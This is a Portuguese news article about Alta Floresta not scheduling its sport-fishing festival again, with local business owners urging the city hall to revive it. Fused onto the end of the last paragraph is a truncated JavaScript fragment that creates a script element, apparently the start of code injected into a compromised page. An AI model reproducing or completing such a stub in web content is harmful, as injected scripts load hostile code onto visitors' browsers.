Capa / Cultura / Mais um ano sem previsão para o festival de Pesca de Alta Floresta

Mais um ano sem previsão para o festival de Pesca de Alta Floresta

festival de pescaRenan Nery

O Festival de Pesca Esportiva de Alta Floresta não tem previsão para ser realizado por mais um ano consecutivo, no entanto as cidades vizinhas de Carlinda e Paranaíta estão realizando o festival normalmente.
Pescadores esportivos e amadores e a população em geral não estão tendo mais este privilégio, festival de pesca atrai equipes de todos o estado a até de outros, e sempre integrou uma das etapa do Campeonato de Pesca do Estado de Mato Grosso, e em 2014 e 2015 o município cancelou o evento. Nos dois últimos anos a Secretaria de Indústria Comércio e Turismo sugeriu que as empresas do ramo de pesca e turismo realizassem o festival com o apoio do Poder Público, porém nada aconteceu.
“Alta Floresta perde muito com isso, por ser um pólo turístico nós temos uma demanda muito grande de visitantes, nós recebemos a proposta da prefeitura, e até participamos como patrocinadores para ajudar na premiação do evento, porém nós como empresa não temos autoridade suficiente para resolver a burocracia ambiental, eu acredito que os órgãos responsáveis deveriam estimular uma campanha juntamente ao Ministério Público para a realização do evento, nós estaremos sempre de portas abertas para receber propostas e temos certeza de que os comerciantes locais do ramo também estarão de prontidão para ser feita esta parceria”, disse o proprietário da empresa Trairão caça e pesca, Rodrigo Sandri Zacchi, em uma entrevista a equipe do jornal O Diário.
O festival de pesca era uma promessa de campanha do prefeito Asiel Bezerra de Araújo, que no primeiro ano realizou o evento com premiação recorde, um público estimado em 6 mil pessoas. Para o empresário Paulo Henrique, municípios economicamente menos favorecidos continuam realizando o festival com êxito, e que Alta Floresta falta força de vontade das lideranças.
“Nós estamos precisando de mais incentivo do órgão responsável, Paranaíta e Carlinda estão tendo os festivais de pesca normalmente, nós não recebemos nenhuma proposta da prefeitura para a realização do evento, o festival é o único lazer que nós pescadores temos, acredito que nós proprietários do comércio de pesca local, teremos que montar uma equipe juntamente com um representante da prefeitura para que seja realizado o evento”, ressaltou o proprietário da empresa Portal da Amazônia, Paulo Henrique.
Os comerciantes locais apoiam a volta do Festival de Pesca de Alta Floresta e cobram uma iniciativa da prefeitura para que seja realizado o evento, pois além de ser um evento tradicional da cidade e ser um dos maiores Festivais de Pesca do Estado, atrai o turismo e fomenta a economia local.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top